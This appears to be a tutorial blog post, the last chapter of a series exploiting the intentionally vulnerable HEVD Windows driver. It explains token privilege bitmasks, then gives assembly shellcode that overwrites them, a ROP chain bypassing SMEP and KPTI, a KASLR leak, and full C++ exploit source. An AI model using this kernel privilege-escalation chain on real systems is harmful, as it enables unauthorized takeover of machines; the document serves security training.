[Cracking Windows Kernel with HEVD] Chapter 4: How do we write a shellcode to elevate privileges and gracefully return to userland?
The end is near
Throughout the previous four chapters, all we have been doing is exploiting a stack-based buffer overflow and bypassing a few kernel mitigations. Apart from the kernel-specific memory mitigations, the exploitation so far has been as vanilla as it gets: a stack overflow with no canary.
In this final post, we will dive into the Windows privilege mechanism and use it to elevate our privileges. Then, we must return to userland. After all, there is no use in elevating privileges or executing code in ring 0 if the computer is going to crash right after! The problem is that we have corrupted the stack with our ROP payload, not to mention the registers: we have clobbered them all, and restoring them by hand would be impractical. That will be our main challenge today.
How privileges work on Windows
It would be difficult to cover everything about how security works on Windows, or even everything about privileges, so I’ll cover only the basics of privileges in this post. Later on I’m planning to write another post just on the Windows security architecture, but with my current post scheduling, this could take as long as a century ^^ (sorry about that!)
"A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers or changing the system time."
That is Microsoft’s definition of privileges on Windows. Privileges are not related to securable objects (such as files and folders), but to access to system resources and system-related tasks. They can be inspected from a Windows terminal with the whoami command: whoami /priv.
This is what appears when a low-privilege user checks its own privileges:
Here we see an administrator:
As you can see, some privileges appear only for the administrator. Each privilege shown has a state: enabled or disabled. In reality, there are three possible attributes for a privilege: present, enabled and enabled by default. Present privileges are the ones shown by the whoami program, and they may be either enabled or disabled. A privilege that is not present, however, cannot be enabled. The state is straightforward: if a privilege is enabled, the user may use it; otherwise, it must be enabled first. The “enabled by default” attribute is also intuitive and needs no explanation.
Ok, so these privileges are associated with the user. But what about processes?
Well, the kernel keeps a structure named EPROCESS for each process. It references another very important data structure named TOKEN. Access token objects “include the identity and privileges of the user account associated with the process or thread”, as explained by Microsoft. When a user starts a new process (or thread), the system creates a copy of the user's access token and attaches it to the process structure. If we intend to elevate the privileges of a process, this is the data structure we will mess with.
Among the many pieces of information stored in the token struct, such as the security identifier (SID) of the user account, the SIDs of the groups the user is a member of, the impersonation level, etc., it also stores the privileges held by the user (or the user’s groups). These are the privileges I spoke of earlier! They live in a data structure called _SEP_TOKEN_PRIVILEGES, and its definition follows:
kd> dt _SEP_TOKEN_PRIVILEGES
nt!_SEP_TOKEN_PRIVILEGES
+0x000 Present : Uint8B
+0x008 Enabled : Uint8B
+0x010 EnabledByDefault : Uint8B
That’s right! Each privilege is represented by one bit in each of three bitmasks: present, enabled and enabled by default. Each bit position maps to a privilege from the list below:
2: SeCreateTokenPrivilege -> Create a token object
3: SeAssignPrimaryTokenPrivilege -> Replace a process-level token
4: SeLockMemoryPrivilege -> Lock pages in memory
5: SeIncreaseQuotaPrivilege -> Increase quotas
6: SeMachineAccountPrivilege -> Add workstations to the domain
7: SeTcbPrivilege -> Act as part of the operating system
8: SeSecurityPrivilege -> Manage auditing and security log
9: SeTakeOwnershipPrivilege -> Take ownership of files/objects
10: SeLoadDriverPrivilege -> Load and unload device drivers
11: SeSystemProfilePrivilege -> Profile system performance
12: SeSystemtimePrivilege -> Change the system time
13: SeProfileSingleProcessPrivilege -> Profile a single process
14: SeIncreaseBasePriorityPrivilege -> Increase scheduling priority
15: SeCreatePagefilePrivilege -> Create a pagefile
16: SeCreatePermanentPrivilege -> Create permanent shared objects
17: SeBackupPrivilege -> Backup files and directories
18: SeRestorePrivilege -> Restore files and directories
19: SeShutdownPrivilege -> Shut down the system
20: SeDebugPrivilege -> Debug programs
21: SeAuditPrivilege -> Generate security audits
22: SeSystemEnvironmentPrivilege -> Edit firmware environment values
23: SeChangeNotifyPrivilege -> Receive notifications of changes to files or directories
24: SeRemoteShutdownPrivilege -> Force shutdown from a remote system
25: SeUndockPrivilege -> Remove computer from docking station
26: SeSyncAgentPrivilege -> Synch directory service data
27: SeEnableDelegationPrivilege -> Enable user accounts to be trusted for delegation
28: SeManageVolumePrivilege -> Manage the files on a volume
29: SeImpersonatePrivilege -> Impersonate a client after authentication
30: SeCreateGlobalPrivilege -> Create global objects
31: SeTrustedCredManAccessPrivilege -> Access Credential Manager as a trusted caller
32: SeRelabelPrivilege -> Modify the mandatory integrity level of an object
33: SeIncreaseWorkingSetPrivilege -> Allocate more memory for user applications
34: SeTimeZonePrivilege -> Adjust the time zone of the computer's internal clock
35: SeCreateSymbolicLinkPrivilege -> Required to create a symbolic link
Credit where it's due, this list was found here. Thank you, Volatility Foundation.
You may observe that the list starts at number 2 and goes all the way up to number 35. Why does it not start at zero, like everything else in computer science? Well, the answer is far from obvious. It is so unobvious that I do not know for sure, but I suspect that the two least significant bits must be zero so that a valid mask cannot be “mistaken” for the number -1. If a vulnerability allows an attacker to somehow change this structure (such as the one we are exploiting), setting it to -1 would be the easiest thing to do.
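To make the three attributes concrete, here is a minimal sketch that models them as three 64-bit masks and applies the rule stated earlier: a privilege can only be enabled if it is present. The struct is an illustrative copy of the layout shown by dt, and the helper names (bit, is_present, is_enabled, try_enable) are hypothetical, not part of any Windows API.

```cpp
#include <cassert>
#include <cstdint>

// Illustrative copy of the three bitmasks of nt!_SEP_TOKEN_PRIVILEGES.
// This is not a kernel header, just a model for experimenting in userland.
struct PrivilegeMasks {
    std::uint64_t present;
    std::uint64_t enabled;
    std::uint64_t enabled_by_default;
};

// Bit numbers taken from the list above.
constexpr unsigned kSeShutdownPrivilege = 19;
constexpr unsigned kSeDebugPrivilege = 20;

// Returns a mask with only the bit of the given privilege set.
constexpr std::uint64_t bit(unsigned privilege) {
    return std::uint64_t{1} << privilege;
}

bool is_present(const PrivilegeMasks &m, unsigned privilege) {
    return (m.present & bit(privilege)) != 0;
}

bool is_enabled(const PrivilegeMasks &m, unsigned privilege) {
    return (m.enabled & bit(privilege)) != 0;
}

// Hypothetical helper: enabling succeeds only for privileges that are present.
bool try_enable(PrivilegeMasks &m, unsigned privilege) {
    if (!is_present(m, privilege)) {
        return false;
    }
    m.enabled |= bit(privilege);
    return true;
}
```

With a model where only SeShutdownPrivilege is present, try_enable(m, kSeShutdownPrivilege) succeeds while try_enable(m, kSeDebugPrivilege) is refused, which is the behaviour a low-privilege user runs into.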
Ok, back to the exploit. “All” we have to do is change the SEP_TOKEN_PRIVILEGES structure, which resides in the TOKEN structure, which in turn is referenced by the EPROCESS structure, to 0xffffffffc (bits 2 through 35 set) on all fields (present, enabled and enabled by default, although the last one is optional).
If we locate this structure in memory and alter it, we have our privilege escalation!
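The mask value can be double-checked with a few lines of arithmetic. The sketch below uses a hypothetical helper, privilege_mask, to build a mask from a range of bit numbers. It shows that bits 2 through 35 give 0xffffffffc, while the eight-digit value 0xfffffffc loaded by the assembly listing further below covers bits 2 through 31 only, so privileges 32 to 35 from the list would stay clear with it.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper: mask with bits first..last (inclusive) set.
// Assumes first <= last <= 63.
constexpr std::uint64_t privilege_mask(unsigned first, unsigned last) {
    return (last == 63 ? ~std::uint64_t{0}
                       : ((std::uint64_t{1} << (last + 1)) - 1)) &
           ~((std::uint64_t{1} << first) - 1);
}

// Every privilege in the list (bits 2..35).
static_assert(privilege_mask(2, 35) == 0xFFFFFFFFCULL, "bits 2..35");
// What a 32-bit-wide constant can cover (bits 2..31).
static_assert(privilege_mask(2, 31) == 0xFFFFFFFCULL, "bits 2..31");

// True if the mask has the bit of the given privilege set.
constexpr bool covers(std::uint64_t mask, unsigned privilege) {
    return (mask & (std::uint64_t{1} << privilege)) != 0;
}
```

For instance, covers(0xFFFFFFFCULL, 20) holds (SeDebugPrivilege), but covers(0xFFFFFFFCULL, 35) does not (SeCreateSymbolicLinkPrivilege).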
Carving a shellcode
As mentioned, we must locate the privileges structure to alter it, and it resides inside the token structure. Given an EPROCESS structure, it is trivial to find the primary token with the PsReferencePrimaryToken routine. It will return the token!
To call this routine, we require an EPROCESS object. No problem! PsLookupProcessByProcessId will give us just that, as long as we provide the PID of the process.
With the token structure at hand, we have to find the privileges structure inside it. The dt command in WinDbg will reveal the offset of the structure:
It resides at offset 0x40. Neat. The steps we must take, so far, are these:
- From a PID, use the PsLookupProcessByProcessId() function to obtain an EPROCESS object for the process whose privileges will be elevated;
- From this EPROCESS object, obtain the TOKEN struct;
- From the TOKEN struct, obtain the SEP_TOKEN_PRIVILEGES struct at offset 0x40;
- Alter each field of this structure to 0xffffffffc.
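The last two steps can be rehearsed in userland before touching assembly. The following is a sketch on a mock structure: MockToken and grant_all are hypothetical names, and the only detail taken from the real layout is the 0x40 offset of the privileges block. Everything before that offset is treated as opaque padding.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

struct SepTokenPrivileges {
    std::uint64_t present;
    std::uint64_t enabled;
    std::uint64_t enabled_by_default;
};

// Mock token: the padding stands in for the fields that are not modeled here.
struct MockToken {
    unsigned char opaque[0x40];
    SepTokenPrivileges privileges;
};
static_assert(offsetof(MockToken, privileges) == 0x40,
              "privileges block must sit at offset 0x40");

// Performs the same writes as the shellcode: three 64-bit stores starting
// at token + 0x40, each one 8 bytes after the previous.
void grant_all(void *token, std::uint64_t mask) {
    unsigned char *p = static_cast<unsigned char *>(token) + 0x40;
    for (std::size_t i = 0; i < 3; ++i) {
        std::memcpy(p + i * sizeof(mask), &mask, sizeof(mask));
    }
}
```

Calling grant_all(&token, mask) on a zeroed MockToken leaves the opaque part untouched and sets present, enabled and enabled_by_default to the mask, which is exactly the effect we want on the real token.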
All right. Let’s write some assembly code:
mov rcx, <PID> ; The first argument to PsLookupProcessByProcessId() is the PID. It will be patched at run time. In the Windows x64 calling convention, rcx holds the first argument.
sub rsp, 0x8 ; The second argument to PsLookupProcessByProcessId() is an out pointer that receives the EPROCESS address. Reserve 8 bytes on the stack for it.
mov rdx, rsp ; rdx holds the second argument: a pointer to the 8 bytes we just reserved.
movabs rbx, <ADDRESS OF PsLookupProcessByProcessId()>
call rbx ; Actually call the function! The EPROCESS pointer will be stored at [rsp].
mov rcx, QWORD PTR [rsp] ; Load the EPROCESS pointer into rcx, the first and only argument of PsReferencePrimaryToken().
movabs rbx, <ADDRESS OF PsReferencePrimaryToken>
call rbx ; Call PsReferencePrimaryToken()! The token address comes back in the return value, AKA the rax register.
add rax, 0x40 ; Adjust the offset. Now rax points directly to SEP_TOKEN_PRIVILEGES.
movabs rcx, 0xfffffffc ; The value written to each SEP_TOKEN_PRIVILEGES field goes in rcx (as a 64-bit value, this sets bits 2 through 31).
mov QWORD PTR [rax], rcx ; Now the magic happens! We change the first field (Present) to 0xfffffffc.
add rax, 0x8 ; Next field...
mov QWORD PTR [rax], rcx ; Changing the second field (Enabled).
add rax, 0x8 ; Final field
mov QWORD PTR [rax], rcx ; Changing the third field (EnabledByDefault).
There is one more thing we should do, which is to return to userland gracefully.
Kristal discovered a nice approach to return to userland with sysret. Sysret is to syscall what ret is to call, but with extra steps.
In reality, upon a normal return to userland, the OS restores the execution context and returns gracefully. What Kristal did, and I encourage you to read his post, is mimic the way the OS returns to userland. His approach did not work here because KPTI was enabled.
Windows has two approaches for returning: one for when KPTI is disabled and another for when it is enabled. Kristal - or any other person as far as I know - has not developed an approach for when KPTI is enabled. Well, neither did I.
Windows has a specific function to return to userland. It is called KiKernelSysretExit(). The first and naive approach I tried was to jump to that function at the end of my shellcode and let the kernel do the heavy lifting, instead of doing it myself in the shellcode. And, to my surprise, it actually worked.
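I added a few extra lines to the end of the shellcode: an add rsp, 0x8 to release the stack slot reserved earlier (it appears as 48 83 c4 08 in the opcodes used by generate_shellcode()), followed by the jump itself:
add rsp, 0x8
movabs rbx, <ADDRESS_TO_SYSRET_KERNEL_FUNCTION>
jmp rbx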
And the kernel did the rest!
I used my boy Vinicius’s brilliant shellcoding tools to transform my assembly code into opcodes. Then I put them in a variable and patched the addresses at run time. My generate_shellcode() function looks like this now:
char *generate_shellcode() {
char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11); // 0x4e+11 (89 bytes) is the size of the shellcode
memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
memcpy(shellcode + 3, &pid, 4); // Patch the PID (32-bit immediate of mov rcx)
memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8); // Patch the address of PsLookupProcessByProcessId
memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8); // Patch the address of PsReferencePrimaryToken
memcpy(shellcode + 0x4e+1, &kernel_sysret, 8); // Patch the address of the sysret exit function
return shellcode;
}
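The patch offsets are easy to get wrong, so it helps to check them against the opcode bytes. Below is a portable sketch (no Win32 calls) that splits the same byte string into one literal per instruction and patches a copy of it. The function name build_shellcode and the offset constants are hypothetical, and the per-line disassembly comments are my own reading of the bytes. The PID check in the usage assumes a little-endian host, which is what x64 is.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Byte template copied from generate_shellcode(), one literal per instruction.
static const unsigned char kTemplate[] =
    "\x48\xc7\xc1\x78\x56\x34\x12"              // mov rcx, imm32 (PID placeholder)
    "\x48\x83\xec\x08"                          // sub rsp, 8
    "\x48\x89\xe2"                              // mov rdx, rsp
    "\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff"  // movabs rbx, imm64 (placeholder)
    "\xff\xd3"                                  // call rbx
    "\x48\x8b\x0c\x24"                          // mov rcx, [rsp]
    "\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff"  // movabs rbx, imm64 (placeholder)
    "\xff\xd3"                                  // call rbx
    "\x48\x83\xc0\x40"                          // add rax, 0x40
    "\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00"  // movabs rcx, 0xfffffffc
    "\x48\x89\x08"                              // mov [rax], rcx
    "\x48\x83\xc0\x08"                          // add rax, 8
    "\x48\x89\x08"                              // mov [rax], rcx
    "\x48\x83\xc0\x08"                          // add rax, 8
    "\x48\x89\x08"                              // mov [rax], rcx
    "\x48\x83\xc4\x08"                          // add rsp, 8
    "\x48\xbb\xc0\x0d\x02\x1b\x05\xf8\xff\xff"  // movabs rbx, imm64 (placeholder)
    "\xff\xe3";                                 // jmp rbx

constexpr std::size_t kTemplateSize = sizeof(kTemplate) - 1;  // drop trailing NUL
static_assert(kTemplateSize == 0x4e + 11, "template must be 89 bytes long");

// Offsets of the immediates patched at run time (same values as in the post).
constexpr std::size_t kPidOffset = 3;
constexpr std::size_t kLookupOffset = 16;
constexpr std::size_t kTokenOffset = 32;
constexpr std::size_t kSysretOffset = 0x4e + 1;

// Hypothetical helper: returns a patched copy of the template.
std::vector<unsigned char> build_shellcode(std::uint32_t pid,
                                           std::uint64_t lookup_addr,
                                           std::uint64_t token_addr,
                                           std::uint64_t sysret_addr) {
    std::vector<unsigned char> code(kTemplate, kTemplate + kTemplateSize);
    std::memcpy(code.data() + kPidOffset, &pid, sizeof(pid));
    std::memcpy(code.data() + kLookupOffset, &lookup_addr, sizeof(lookup_addr));
    std::memcpy(code.data() + kTokenOffset, &token_addr, sizeof(token_addr));
    std::memcpy(code.data() + kSysretOffset, &sysret_addr, sizeof(sysret_addr));
    return code;
}
```

Each patched offset lands right after a two- or three-byte opcode prefix (48 c7 c1 or 48 bb), so checking that those prefixes survive patching is a cheap sanity test for the offsets.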
And boom! It worked!
The final exploit
I run the exploit:
On the left, we see my exploit’s debug messages. On the right is the CMD it spawned, which will have its privileges elevated. I ran whoami /priv there to show that it starts out unprivileged.
When I press enter on the exploit terminal, the privileges are elevated.
Finally! The system did not crash and privileges were elevated. I will leave the full source code at the end of the post.
Conclusions
We did it! Phew, this took forever for me to write. I apologize for the extremely long delay. From this exercise, we may conclude a few things:
- Windows kernel mitigations are not that powerful. Windows’ KASLR is easily bypassable when you are running at medium integrity level or above. SMEP is useful, but there is a neat gadget to bypass it easily. KPTI was the hardest enemy, but it can be bypassed by allocating an executable pool and jumping to it.
- If we cannot restore the stack, we can just let the kernel do the heavy lifting by calling its own exit function.
- Assembly programming is very useful for shellcoding at this level.
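The KASLR point comes down to simple arithmetic, which get_kernel_symbol_addr() in the source code below performs: take the address of a symbol inside a user-mode mapping of ntoskrnl.exe, subtract the mapping's base to get the symbol's offset, then add the leaked kernel base. A minimal sketch of just that arithmetic follows. The function name rebase is hypothetical, and any addresses passed to it here would be made-up numbers for illustration, not real kernel addresses.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper: translates an address from a user-mode mapping of a
// kernel image into the address the same symbol has in the running kernel.
// (user_symbol - user_base) is the symbol's offset inside the image.
constexpr std::uint64_t rebase(std::uint64_t user_symbol,
                               std::uint64_t user_base,
                               std::uint64_t kernel_base) {
    return kernel_base + (user_symbol - user_base);
}

// The offset inside the image is preserved by the translation.
static_assert(rebase(0x1000 + 0x20, 0x1000, 0x5000) == 0x5000 + 0x20,
              "offset must carry over to the new base");
```

The hard-coded gadget offsets in the exploit follow the same idea: they are offsets from the image base, so adjust_offsets() only has to add the leaked base to each of them.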
Hope you enjoyed it! See you next time.
Source code
#include <cstdio>
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
// Name of the device
#define DEVICE_NAME "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
unsigned long long g_add_rsp_20h_ret = 0xa155de;
unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_sysret = 0xa13dc0;
unsigned long long kernel_memcpy;
DWORD pid;
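// Mirrors nt!_SEP_TOKEN_PRIVILEGES: each field is a 64-bit bitmask (Uint8B means 8 bytes, not 8 bits)
typedef struct sSepTokenPrivileges {
ULONGLONG present;
ULONGLONG enabled;
ULONGLONG enabled_by_default;
} SEP_TOKEN_PRIVILEGES;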
typedef NTSTATUS(*_PsLookupProcessByProcessId)(IN HANDLE, OUT PVOID *);
_PsLookupProcessByProcessId kernel_PsLookupProcessByProcessId;
typedef PVOID(*_PsReferencePrimaryToken)(PVOID);
_PsReferencePrimaryToken kernel_PsReferencePrimaryToken;
// IOCTL number for the stack overflow handler
#define STACK_OVERFLOW_IOCTL_NUMBER IOCTL(0x800)
// Returns kernel base address
unsigned long long get_kernel_base_addr() {
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (unsigned long long)drivers[0];
}
// Gets the handle for the device driver
HANDLE get_handle() {
HANDLE h = CreateFileA(DEVICE_NAME,
FILE_READ_ACCESS | FILE_WRITE_ACCESS,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
NULL);
if (h == INVALID_HANDLE_VALUE) {
printf("Failed to get handle =(\n");
return NULL;
}
return h;
}
void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
memcpy(in_buffer + *offset, data, size);
printf("Wrote %llx to offset %zu\n", *data, *offset);
*offset += size;
}
PVOID get_kernel_symbol_addr(const char *symbol) {
PVOID kernelBaseAddr;
HMODULE userKernelHandle;
PCHAR functionAddress;
unsigned long long offset;
kernelBaseAddr = (PVOID)get_kernel_base_addr(); // Loads kernel base address
userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe"); // Gets kernel binary
if (userKernelHandle == NULL) { // LoadLibraryA returns NULL on failure
return NULL;
}
functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol); // Finds given symbol
if (functionAddress == NULL) {
// Could not find symbol
return NULL;
}
offset = functionAddress - ((PCHAR)userKernelHandle); // Subtracts the loaded binary's base address from the found address. This way, we will find the offset of the symbol for base address 0.
return (PVOID)(((PCHAR)kernelBaseAddr) + offset); // Adds the offset to the leaked base address.
}
void adjust_offsets()
{
unsigned long long kernel_base_addr = get_kernel_base_addr();
g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
g_add_rsp_20h_ret += kernel_base_addr;
g_pop_rdx_ret += kernel_base_addr;
g_push_rax_pop_rbx_ret += kernel_base_addr;
g_push_rax_pop_r13_ret += kernel_base_addr;
g_xchg_r8_r13_ret += kernel_base_addr;
g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
g_pop_r8_ret += kernel_base_addr;
g_jmp_rbx += kernel_base_addr;
kernel_sysret += kernel_base_addr;
kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
kernel_PsLookupProcessByProcessId = (_PsLookupProcessByProcessId) get_kernel_symbol_addr("PsLookupProcessByProcessId");
kernel_PsReferencePrimaryToken = (_PsReferencePrimaryToken) get_kernel_symbol_addr("PsReferencePrimaryToken");
printf("PsReferencePrimaryToken offset from kernel base: %llx\n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
}
// Spawns cmd.exe in its own console and returns its PID ((DWORD)-1 on failure)
DWORD spawnCmd() {
STARTUPINFOA si;
PROCESS_INFORMATION pi;
char cmd[] = "C:\\Windows\\System32\\cmd.exe";
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
// Start the child process. The ANSI variant is used explicitly because cmd is a char buffer.
if (!CreateProcessA(NULL, // No module name (use command line)
cmd, // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
CREATE_NEW_CONSOLE, // Give the child its own console window
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFOA structure
&pi) // Pointer to PROCESS_INFORMATION structure
)
{
printf("CreateProcess failed (%lu).\n", GetLastError());
return (DWORD)-1;
}
// Only the PID is needed, so the handles can be closed right away
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return pi.dwProcessId;
}
char *generate_shellcode() {
char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11);
memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
memcpy(shellcode + 3, &pid, 4);
memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8);
memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8);
memcpy(shellcode + 0x4e+1, &kernel_sysret, 8);
return shellcode;
}
//Does everything
void do_buffer_overflow(HANDLE h)
{
SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20;
PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
memset((char *)in_buffer, 'A', in_buffer_size);
SIZE_T offset = 2072;
pid = spawnCmd();
adjust_offsets();
char *shellcode = generate_shellcode();
unsigned long long size_of_copy = 0x4e+11;
add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
offset += 0x20;
add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
system("pause");
printf("Sending buffer.\n");
//Sends buffer through IOCTL
BOOL result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
if (!result)
{
printf("IOCTL Failed: %X\n", GetLastError());
}
//Frees allocated memory
HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}
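int main(int argc, char **argv)
{
HANDLE h = get_handle();
if (h == NULL) {
return 1; // get_handle() already printed the error
}
do_buffer_overflow(h);
CloseHandle(h);
system("pause");
return 0;
}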